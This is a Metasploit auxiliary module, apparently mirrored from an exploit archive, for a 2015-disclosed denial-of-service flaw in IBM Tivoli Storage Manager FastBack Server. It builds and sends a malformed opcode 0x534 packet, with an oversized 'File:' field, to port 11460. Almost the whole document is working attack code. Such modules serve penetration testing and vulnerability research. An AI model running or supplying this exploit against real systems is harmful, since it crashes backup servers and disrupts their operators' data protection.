Share
## https://sploitus.com/exploit?id=PACKETSTORM:180546
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",  
'Description' => %q{  
This module exploits a denial of service condition present in IBM Tivoli Storage Manager  
FastBack Server when dealing with packets triggering the opcode 0x534 handler.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Gianni Gnesa', # Public disclosure/Proof of Concept  
'William Webb <william_webb[at]rapid7.com>', # Metasploit  
],  
'References' =>  
[  
['EDB', '38979'],  
['OSVDB', '132307']  
],  
'DisclosureDate' => '2015-12-15',  
))  
  
register_options(  
[  
Opt::RPORT(11460)  
])  
end  
  
def tv_pkt(opcode, p1="", p2="", p3="")  
buf = Rex::Text.rand_text_alpha(0x0C)  
buf += [opcode].pack("V")  
buf += [0x00].pack("V")  
buf += [p1.length].pack("V")  
buf += [p1.length].pack("V")  
buf += [p2.length].pack("V")  
buf += [p1.length + p2.length].pack("V")  
buf += [p3.length].pack("V")  
  
buf += Rex::Text.rand_text_alpha(0x08)  
  
buf += p1  
buf += p2  
buf += p3  
  
pkt = [buf.length].pack("N")  
pkt << buf  
  
return pkt  
end  
  
def run  
target_opcode = 0x534  
connect  
print_status("Connected to: #{rhost} port: #{rport}")  
print_status("Sending malicious packet")  
  
p = tv_pkt(target_opcode,  
"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],  
Rex::Text.rand_text_alpha(0x60),  
Rex::Text.rand_text_alpha(0x60)  
)  
  
sock.put(p)  
print_status("Packet sent!")  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex  
print_error("Exploit failed: #{ex.class} #{ex.message}")  
elog(ex)  
ensure  
disconnect  
end  
end